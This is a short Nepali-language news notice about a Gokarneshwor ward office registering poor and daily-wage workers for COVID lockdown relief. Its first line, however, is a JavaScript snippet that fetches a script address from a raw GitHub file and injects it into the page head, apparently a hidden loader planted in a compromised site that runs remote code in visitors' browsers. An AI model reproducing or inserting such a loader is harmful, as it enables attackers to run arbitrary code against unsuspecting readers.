;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
चैत १९,
काठमाडौँ, कोरोना भाइरस संक्रमणका कारण देशमा लकडाउन भएको अवस्थामा विपन्न वर्ग र दैनिक ज्यालादारी गर्ने श्रमिक बर्गलाई गोकर्नेश्वोर नगरपालिका वडा नं ५ को तर्फबाट राहत वितरण गर्ने भनी सुचना प्रकाशन गरेको छ |
वडा समन्वयन समितिको निर्णय अनुसार यस वडा भित्र बसोबास गर्ने व्यक्तिहरुलाई घरबेटीको सिफारिसमा नाम संकलन गर्ने कर्येहरु भैरहेको छ, आ-आफ्नो पाएक पर्ने स्थानका वडा सदस्यहरुसंग सम्पर्क गरि नाम टिपाउनु हुन अनुरोध गरि सुचना प्रकाशन गरिएको हो |
नाम संकलन गर्दा सहि व्यक्ति पहिचान गरि विवरण दिनु होला गलत भएमा नेपाल सरकारको नियम बमोजिम कारबाही गरिन्छा साथै फिफरिघरबेटीको नागरिकताको फोटोकफी अनिवार्य राख्न अनुरोध गरिएको छ |
सम्पर्क:
फेसबुक प्रतिक्रियाहरु